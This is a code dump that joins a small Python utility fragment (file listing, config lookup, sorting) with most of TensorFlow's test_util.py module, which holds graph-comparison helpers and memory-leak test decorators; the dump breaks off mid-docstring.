def getFileList(theDir, recursive=False, match='.*'):
fileList = {}
for (dirpath, dirnames, filenames) in os.walk(theDir):
if dirpath == 'static/rrd' or re.match('.*Debian.*amd', dirpath) or not re.match(match, dirpath.split('/')[-1]):
continue
tempDict = {}
for filename in filenames:
tempId = {filename: {"ds": [], "cf": []}}
tempDict.update(tempId)
fileList.update({dirpath: tempDict})
if not recursive:
break
return fileList
# Gets file location based on supportFiles.txt
def getSupportFilePath(desiredFile, supportFilePath=None):
if supportFilePath is None:
supportFilePath = "/var/webServer/supportFiles.txt"
with open(supportFilePath, 'r') as theFile:
theFileLines = [x.rstrip() for x in theFile.readlines()]
for l in theFileLines:
if re.search("=", l):
key, value = l.split('=')
if key == desiredFile:
return value
return None
def sortOrder(array, sortBy, orderBy):
ret = []
used = {}
for i in range(1, len(array)):
j = i
while j > 0 and array[j][sortBy] < array[j-1][sortBy]:
array[j], array[j-1] = array[j-1], array[j]
j -= 1
if orderBy == "desc":
array = array[::-1]
return array
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
import collections
from collections import OrderedDict
import contextlib
import functools
import gc
import itertools
import math
import os
import random
import re
import tempfile
import threading
import time
import unittest
from absl.testing import parameterized
import numpy as np
import six
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_sanitizers
from tensorflow.python import tf2
from tensorflow.python.client import device_lib
from tensorflow.python.client import pywrap_tf_session
from tensorflow.python.client import session
from tensorflow.python.compat.compat import forward_compatibility_horizon
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import tape
from tensorflow.python.framework import config
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import gpu_util
from tensorflow.python.framework import importer
from tensorflow.python.framework import indexed_slices
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import tfrt_utils
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import control_flow_util_v2
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import summary_ops_v2
from tensorflow.python.ops import variables
from tensorflow.python.ops.ragged import ragged_ops # pylint: disable=unused-import
from tensorflow.python.ops.ragged import ragged_tensor
from tensorflow.python.ops.ragged import ragged_tensor_value
from tensorflow.python.platform import _pywrap_stacktrace_handler
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import _pywrap_util_port
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import nest
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
from tensorflow.python.util import traceback_utils
from tensorflow.python.util.compat import collections_abc
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
# If the below import is made available through the BUILD rule, then this
# function is overridden and will instead return True and cause Tensorflow
# graphs to be compiled with XLA.
def is_xla_enabled():
return False
try:
from tensorflow.python.framework.is_xla_test_true import is_xla_enabled # pylint: disable=g-import-not-at-top, unused-import
except Exception: # pylint: disable=broad-except
pass
# Uses the same mechanism as above to selectively enable/disable MLIR
# compilation.
def is_mlir_bridge_enabled():
return None
try:
from tensorflow.python.framework.is_mlir_bridge_test_false import is_mlir_bridge_enabled # pylint: disable=g-import-not-at-top, unused-import
except ImportError:
try:
from tensorflow.python.framework.is_mlir_bridge_test_true import is_mlir_bridge_enabled # pylint: disable=g-import-not-at-top, unused-import
except ImportError:
pass
def is_asan_enabled():
"""Check if ASAN is enabled."""
return pywrap_sanitizers.is_asan_enabled()
def is_msan_enabled():
"""Check if MSAN is enabled."""
return pywrap_sanitizers.is_msan_enabled()
def is_tsan_enabled():
"""Check if TSAN is enabled."""
return pywrap_sanitizers.is_tsan_enabled()
def is_ubsan_enabled():
"""Check if UBSAN is enabled."""
return pywrap_sanitizers.is_ubsan_enabled()
def _get_object_count_by_type(exclude=()):
return (
collections.Counter([type(obj).__name__ for obj in gc.get_objects()]) -
collections.Counter([type(obj).__name__ for obj in exclude]))
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or a empty string.
This method should only be used in tests written with `tf.test.TestCase`.
>>> class MyTest(tf.test.TestCase):
...
... def test_add_on_gpu(self):
... if not tf.test.is_built_with_gpu_support():
... self.skipTest("test is only applicable on GPU")
...
... with tf.device(tf.test.gpu_device_name()):
... self.assertEqual(tf.math.add(1.0, 2.0), 3.0)
"""
for x in device_lib.list_local_devices():
if x.device_type == "GPU":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
@tf_export("test.assert_equal_graph_def", v1=[])
def assert_equal_graph_def_v2(expected, actual):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent. This function
ignores randomized attribute values that may appear in V2 checkpoints.
Args:
expected: The `GraphDef` we expected.
actual: The `GraphDef` we have.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2=True,
hash_table_shared_name=True)
@tf_export(v1=["test.assert_equal_graph_def"])
def assert_equal_graph_def_v1(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
hash_table_shared_name: boolean determining whether to ignore randomized
shared_names that appear in HashTableV2 op defs.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2,
hash_table_shared_name)
def assert_equal_graph_def(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for actual, got %s" %
type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for expected, got %s" %
type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
if hash_table_shared_name:
_strip_hash_table_shared_name(actual)
_strip_hash_table_shared_name(expected)
diff = pywrap_tf_session.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(compat.as_bytes(_SHARDED_SAVE_OP_PATTERN),
attr_tensor_string_value)):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
_TABLE_SHARED_NAME_PATTERN = r"hash_table_[0-9a-z\-]+"
def _strip_hash_table_shared_name(graph_def):
for node in graph_def.node:
delete_keys = []
if node.op == "HashTableV2" and "shared_name" in node.attr:
if re.match(compat.as_bytes(_TABLE_SHARED_NAME_PATTERN),
node.attr["shared_name"].s):
delete_keys.append("shared_name")
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return _pywrap_util_port.IsGoogleCudaEnabled()
def IsBuiltWithROCm():
return _pywrap_util_port.IsBuiltWithROCm()
def IsBuiltWithXLA():
return _pywrap_util_port.IsBuiltWithXLA()
def IsBuiltWithNvcc():
return _pywrap_util_port.IsBuiltWithNvcc()
def GpuSupportsHalfMatMulAndConv():
return _pywrap_util_port.GpuSupportsHalfMatMulAndConv()
def IsMklEnabled():
return (_pywrap_util_port.IsMklEnabled() or
os.getenv("TF_ENABLE_ONEDNN_OPTS", "False").lower() in ["true", "1"])
def InstallStackTraceHandler():
_pywrap_stacktrace_handler.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 3-, 4-, or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {3: [0, 2, 1], 4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
return fn(*args, **kwargs)
return wrapper
return real_skip_if
@contextlib.contextmanager
def skip_if_error(test_obj, error_type, messages=None):
"""Context manager to skip cases not considered failures by the tests.
Note that this does not work if used in setUpClass/tearDownClass.
Usage in setUp/tearDown works fine just like regular test methods.
Args:
test_obj: A test object provided as `self` in the test methods; this object
is usually an instance of `unittest.TestCase`'s subclass and should have
`skipTest` method.
error_type: The error type to skip. Note that if `messages` are given, both
`error_type` and `messages` need to match for the test to be skipped.
messages: Optional, a string or list of strings. If `None`, the test will be
skipped if `error_type` matches what is raised; otherwise, the test is
skipped if any of the `messages` is contained in the message of the error
raised, and `error_type` matches the error raised.
Yields:
Nothing.
"""
if messages:
messages = nest.flatten(messages)
try:
yield
except error_type as e:
if not messages or any(message in str(e) for message in messages):
test_obj.skipTest("Skipping error: {}: {}".format(type(e), str(e)))
else:
raise
def enable_c_shapes(fn):
"""No-op. TODO(b/74620627): Remove this."""
return fn
def with_c_shapes(cls):
"""No-op. TODO(b/74620627): Remove this."""
return cls
def enable_control_flow_v2(fn):
"""Decorator for enabling CondV2 and WhileV2 on a test.
Note this enables using CondV2 and WhileV2 after running the test class's
setup/teardown methods.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
enable_control_flow_v2_old = control_flow_util.ENABLE_CONTROL_FLOW_V2
control_flow_util.ENABLE_CONTROL_FLOW_V2 = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util.ENABLE_CONTROL_FLOW_V2 = enable_control_flow_v2_old
return wrapper
def with_control_flow_v2(cls):
"""Adds methods that call original methods with WhileV2 and CondV2 enabled.
Note this enables CondV2 and WhileV2 in new methods after running the test
class's setup method.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
If a test function has _disable_control_flow_v2 attr set to True (using the
@disable_control_flow_v2 decorator), the v2 function is not generated for it.
Example:
@test_util.with_control_flow_v2
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
@test_util.disable_control_flow_v2("b/xyzabc")
def testDisabledForV2(self):
...
Generated class:
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
def testEnabledForV2WithControlFlowV2(self):
// Enable V2 flags.
testEnabledForV2(self)
// Restore V2 flags.
def testDisabledForV2(self):
...
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return cls
for name, value in cls.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix) and
not getattr(value, "_disable_control_flow_v2", False)):
setattr(cls, name + "WithControlFlowV2", enable_control_flow_v2(value))
return cls
def disable_control_flow_v2(unused_msg):
"""Decorator for a function in a with_control_flow_v2 enabled test class.
Blocks the function from being run with v2 control flow ops.
Args:
unused_msg: Reason for disabling.
Returns:
The wrapped function with _disable_control_flow_v2 attr set to True.
"""
def wrapper(func):
func._disable_control_flow_v2 = True
return func
return wrapper
def enable_output_all_intermediates(fn):
"""Force-enable outputing all intermediates from functional control flow ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
output_all_intermediates_old = \
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = \
output_all_intermediates_old
return wrapper
def assert_no_new_pyobjects_executing_eagerly(func=None, warmup_iters=2):
"""Decorator for asserting that no new Python objects persist after a test.
Runs the test multiple times executing eagerly, first as a warmup and then to
let objects accumulate. The warmup helps ignore caches which do not grow as
the test is run repeatedly.
Useful for checking that there are no missing Py_DECREFs in the C exercised by
a bit of Python.
Args:
func: The function to test.
warmup_iters: The numer of warmup iterations, excluded from measuring.
Returns:
The wrapped function performing the test.
"""
def wrap_f(f):
def decorator(self, *args, **kwargs):
"""Warms up, gets object counts, runs the test, checks for new objects."""
with context.eager_mode():
gc.disable()
# Run the test 2 times as warmup, in an attempt to fill up caches, which
# should not grow as the test is run repeatedly below.
#
# TODO(b/117156879): Running warmup twice is black magic; we have seen
# tests that fail with 1 warmup run, and pass with 2, on various
# versions of python2.7.x.
for _ in range(warmup_iters):
f(self, *args, **kwargs)
# Since we aren't in the normal test lifecycle, we need to manually run
# cleanups to clear out their object references.
self.doCleanups()
# Some objects are newly created by _get_object_count_by_type(). So
# create and save as a dummy variable to include it as a baseline.
obj_count_by_type = _get_object_count_by_type()
gc.collect()
# Make sure any registered functions are cleaned up in the C++ runtime.
registered_function_names = context.context().list_function_names()
# unittest.doCleanups adds to self._outcome with each unwound call.
# These objects are retained across gc collections so we exclude them
# from the object count calculation.
obj_count_by_type = _get_object_count_by_type(
exclude=gc.get_referents(self._outcome.errors,
self._outcome.skipped))
if ops.has_default_graph():
collection_sizes_before = {
collection: len(ops.get_collection(collection))
for collection in ops.get_default_graph().collections
}
for _ in range(3):
f(self, *args, **kwargs)
# Since we aren't in the normal test lifecycle, we need to manually run
# cleanups to clear out their object references.
self.doCleanups()
# Note that gc.get_objects misses anything that isn't subject to garbage
# collection (C types). Collections are a common source of leaks, so we
# test for collection sizes explicitly.
if ops.has_default_graph():
for collection_key in ops.get_default_graph().collections:
collection = ops.get_collection(collection_key)
size_before = collection_sizes_before.get(collection_key, 0)
if len(collection) > size_before:
raise AssertionError(
("Collection %s increased in size from "
"%d to %d (current items %s).") %
(collection_key, size_before, len(collection), collection))
# Make sure our collection checks don't show up as leaked memory by
# removing references to temporary variables.
del collection
del collection_key
del size_before
del collection_sizes_before
gc.collect()
# There should be no new Python objects hanging around.
obj_count_by_type = (
_get_object_count_by_type(
exclude=gc.get_referents(self._outcome.errors,
self._outcome.skipped)) -
obj_count_by_type)
# There should be no newly registered functions hanging around.
leftover_functions = (
context.context().list_function_names() - registered_function_names)
assert not leftover_functions, (
"The following functions were newly created: %s" %
leftover_functions)
# In some cases (specifically on MacOS), new_count is somehow
# smaller than previous_count.
# Using plain assert because not all classes using this decorator
# have assertLessEqual
assert not obj_count_by_type, (
"The following objects were newly created: %s" %
str(obj_count_by_type))
gc.enable()
return decorator
if func is None:
return wrap_f
else:
return wrap_f(func)
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensorflow_object(obj):
try:
return isinstance(obj,
(ops.Tensor, variables.Variable,
tensor_shape.Dimension, tensor_shape.TensorShape))
except (ReferenceError, AttributeError):
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(
id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
outside_executed_eagerly = context.executing_eagerly()
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
ops.get_default_graph()._graph_key = outside_graph_key
if outside_executed_eagerly:
with context.eager_mode():
result = f(self, **kwargs)
else:
result = f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
context.context()._clear_caches() # pylint: disable=protected-access
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensorflow_object(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return result
return decorator
def _find_reference_cycle(objects, idx):
def get_ignore_reason(obj, denylist):
"""Tests whether an object should be omitted from the dependency graph."""
if len(denylist) > 100:
return "<depth limit>"
if tf_inspect.isframe(obj):
if "test_util.py" in tf_inspect.getframeinfo(obj)[0]:
return "<test code>"
for b in denylist:
if b is obj:
return "<test code>"
if obj is denylist:
return "<test code>"
return None
# Note: this function is meant to help with diagnostics. Its output is purely
# a human-readable representation, so you may freely modify it to suit your
# needs.
def describe(obj, denylist, leaves_only=False):
"""Returns a custom human-readable summary of obj.
Args:
obj: the value to describe.
denylist: same as denylist in get_ignore_reason.
leaves_only: boolean flag used when calling describe recursively. Useful
for summarizing collections.
"""
if get_ignore_reason(obj, denylist):
return "{}{}".format(get_ignore_reason(obj, denylist), type(obj))
if tf_inspect.isframe(obj):
return "frame: {}".format(tf_inspect.getframeinfo(obj))
elif tf_inspect.ismodule(obj):
return "module: {}".format(obj.__name__)
else:
if leaves_only:
return "{}, {}".format(type(obj), id(obj))
elif isinstance(obj, list):
return "list({}): {}".format(
id(obj), [describe(e, denylist, leaves_only=True) for e in obj])
elif isinstance(obj, tuple):
return "tuple({}): {}".format(
id(obj), [describe(e, denylist, leaves_only=True) for e in obj])
elif isinstance(obj, dict):
return "dict({}): {} keys".format(id(obj), len(obj.keys()))
elif tf_inspect.isfunction(obj):
return "function({}) {}; globals ID: {}".format(
id(obj), obj.__name__, id(obj.__globals__))
else:
return "{}, {}".format(type(obj), id(obj))
def build_ref_graph(obj, graph, reprs, denylist):
"""Builds a reference graph as <referrer> -> <list of referents>.
Args:
obj: The object to start from. The graph will be built by recursively
adding its referrers.
graph: Dict holding the graph to be built. To avoid creating extra
references, the graph holds object IDs rather than actual objects.
reprs: Auxiliary structure that maps object IDs to their human-readable
description.
denylist: List of objects to ignore.
"""
referrers = gc.get_referrers(obj)
denylist = denylist + (referrers,)
obj_id = id(obj)
for r in referrers:
if get_ignore_reason(r, denylist) is None:
r_id = id(r)
if r_id not in graph:
graph[r_id] = []
if obj_id not in graph[r_id]:
graph[r_id].append(obj_id)
build_ref_graph(r, graph, reprs, denylist)
reprs[r_id] = describe(r, denylist)
def find_cycle(el, graph, reprs, path):
"""Finds and prints a single cycle in the dependency graph."""
if el not in graph:
return
for r in graph[el]:
if r in path:
logging.error("Reference cycle sample:")
for p in path + (r,):
logging.error(reprs.get(p, "unknown object " + str(p)))
return True
else:
if find_cycle(r, graph, reprs, path + (r,)):
return True
return False
obj = objects[idx]
graph = {} # referrer ID -> object ID
reprs = {} # object ID -> description
build_ref_graph(obj, graph, reprs, (objects, graph, reprs, get_ignore_reason,
describe, build_ref_graph, find_cycle))
for k in graph:
if find_cycle(k, graph, reprs, ()):
return True
return False
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
# Force-load `distribution_strategy_context` to prevent GC at
# test time when using eager. Remove once b/117329403 is resolved.
tape.distribution_strategy_context.get_strategy()
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
result = f(self, **kwargs)
gc.collect()
new_garbage = len(gc.garbage)
if new_garbage > previous_garbage:
for i, obj in enumerate(gc.garbage[previous_garbage:]):
# Known false positive for ast.fix_missing_locations.
if getattr(obj, "__module__", "") == "ast":
new_garbage -= 3
if new_garbage > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error("Object %d of %d", i,
len(gc.garbage) - previous_garbage)
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s", _safe_object_str(obj))
logging.error(
" Referrer types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
logging.error(
" Referent types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referents(obj)]))
logging.error(" Object attribute names: %s", dir(obj))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception: # pylint: disable=broad-except
logging.error("(Exception while printing object)")
# When garbage is created, this call can help identify reference cycles,
# which are typically the cause of such garbage.
if new_garbage > previous_garbage:
for i in range(previous_garbage, new_garbage):
if _find_reference_cycle(gc.garbage, i):
break
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, new_garbage)
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return result
return decorator
def _combine_named_parameters(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
sort_by_key = lambda k: k[0]
combinations = []
for key, values in sorted(kwargs.items(), key=sort_by_key):
if not isinstance(values, list):
values = [values]
combinations.append([(key, value) for value in values])
return [OrderedDict(result) for result in itertools.product(*combinations)]
def generate_combinations_with_testcase_name(**kwargs):
"""Generate combinations based on its keyword arguments using combine().
This function calls combine() and appends a testcase name to the list of
dictionaries returned. The 'testcase_name' key is a required for named
parameterized tests.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
combinations = _combine_named_parameters(**kwargs)
named_combinations = []
for combination in combinations:
assert isinstance(combination, OrderedDict)
name = "".join([
"_{}_{}".format("".join(filter(str.isalnum, key)),
"".join(filter(str.isalnum, str(value))))
for key, value in combination.items()
])
named_combinations.append(
OrderedDict(
list(combination.items()) +
[("testcase_name", "_test{}".format(name))]))
return named_combinations
def run_all_in_graph_and_eager_modes(cls):
"""Execute all test methods in the given class with and without eager."""
base_decorator = run_in_graph_and_eager_modes
for name in dir(cls):
if (not name.startswith(unittest.TestLoader.testMethodPrefix) or
name.startswith("testSkipEager") or
name.startswith("test_skip_eager") or
name == "test_session"):
continue
value = getattr(cls, name, None)
if callable(value):
setattr(cls, name, base_decorator(value))
return cls
def enable_eager_op_as_function(fn):
"""Decorator for enabling eager_op_as_function on a test.
This function returns a decorator intended to be applied to test methods in
a `tf.test.TestCase` class. Doing so will enable run_eager_op_as_function,
reset the context, execute the test, then reset the context to the state
it was in prior to this test.
Example:
class MyTest(test.TestCase):
@enable_eager_op_as_function
def testFoo(self):
...
Args:
fn: the function to be wrapped.
Returns:
The wrapped function.
"""
def wrapper(*args, **kwargs):
# If `run_eager_op_as_function` is already enabled do nothing.
if context.run_eager_op_as_function_enabled():
return fn(*args, **kwargs)
context.enable_run_eager_op_as_function()
try:
return fn(*args, **kwargs)
finally:
context.disable_run_eager_op_as_function()
return wrapper
def with_eager_op_as_function(cls=None, only_as_function=False):
"""Adds methods that call original methods with eager_op_as_function enabled.
Example:
@test_util.with_eager_op_as_function
class SessionTest(test.TestCase):
def testEnabledForEagerOpAsFunction(self):
...
